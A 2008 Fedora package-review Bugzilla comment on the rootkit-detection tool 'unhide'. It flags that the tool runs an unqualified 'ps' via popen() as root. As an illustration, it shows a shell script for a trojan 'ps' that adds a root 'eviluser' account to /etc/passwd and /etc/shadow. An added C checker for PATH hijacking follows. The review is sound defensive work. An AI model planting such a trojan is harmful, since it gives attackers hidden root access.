[Bug 469843] Review Request: unhide - Tool to find hidden processes and TCP/UDP ports from rootkits
bugzilla at redhat.com
Mon Dec 8 19:57:48 UTC 2008
https://bugzilla.redhat.com/show_bug.cgi?id=469843
--- Comment #5 from manuel wolfshant <wolfy at nobugconsulting.ro> 2008-12-08 14:57:46 EDT ---
Looking at the code, I see that unhide.c does:
#define COMMAND "ps -eLf | awk '{ print $2 }' | grep -v PID"
followed by
fich_tmp=popen (COMMAND, "r") ;
Now, my C is quite rusty, but
- AFAIR, you must be root to see some of the info this program requires
- anything named "ps" and found in root's PATH will be launched by the above
code
To be honest, I would not run this "security application" on my system. I am
afraid of something along
cat >> /usr/local/bin/ps << EOF
#! /bin/bash
echo "eviluser:x:0:0:root:/root:/bin/bash" >> /etc/passwd
echo "eviluser:$1$FvAHRp.t$nuD9eJQjgdgE7aXBNfBM/1:13805:0:99999:7:::" >>
/etc/shadow
/bin/ps $*
EOF
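Added example, not part of the comment above and not code from unhide: a C check for the concern raised there, reporting which "ps" the shell behind popen() would pick from a given PATH and whether that first match lies outside a trusted directory list. The function name path_hijack_risk and the trusted list are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumption: only these root-owned directories count as trusted. */
static const char *TRUSTED[] = { "/bin", "/usr/bin", "/sbin", "/usr/sbin" };

static int is_trusted(const char *dir, size_t len) {
    for (size_t i = 0; i < sizeof TRUSTED / sizeof *TRUSTED; i++)
        if (strlen(TRUSTED[i]) == len && memcmp(TRUSTED[i], dir, len) == 0)
            return 1;
    return 0;
}

/* Walk `path` left to right, as the shell behind popen() does, and stop at
 * the first regular file named `name` with an execute bit set.
 * Returns 0 if that file is in a trusted directory, 1 if it is not (a
 * root-run popen("ps ...") would launch it), -1 if nothing matches.
 * `hit` receives the winning file name, or "" when nothing matches. */
int path_hijack_risk(const char *name, const char *path, char *hit, size_t hitlen) {
    const char *p = path;
    for (;;) {
        const char *end = strchr(p, ':');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        const char *dir = len ? p : ".";   /* empty element = current directory */
        size_t dlen = len ? len : 1;
        struct stat st;
        int n = snprintf(hit, hitlen, "%.*s/%s", (int)dlen, dir, name);
        if (n > 0 && (size_t)n < hitlen && stat(hit, &st) == 0 &&
            S_ISREG(st.st_mode) && (st.st_mode & (S_IXUSR | S_IXGRP | S_IXOTH)))
            return is_trusted(dir, dlen) ? 0 : 1;
        if (!end) break;
        p = end + 1;
    }
    if (hitlen) hit[0] = '\0';
    return -1;
}

int main(void) {
    char hit[4096];
    const char *path = getenv("PATH");
    int r = path_hijack_risk("ps", path ? path : "", hit, sizeof hit);
    printf("euid=%d ps=%s verdict=%s\n", (int)geteuid(), hit,
           r == 0 ? "trusted" : r == 1 ? "UNTRUSTED" : "not found");
    return r == 1;
}
```

Inside the program itself, the usual remedy is to invoke the tool by absolute path or to set PATH to a fixed value before calling popen().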
More information about the Fedora-package-review
mailing list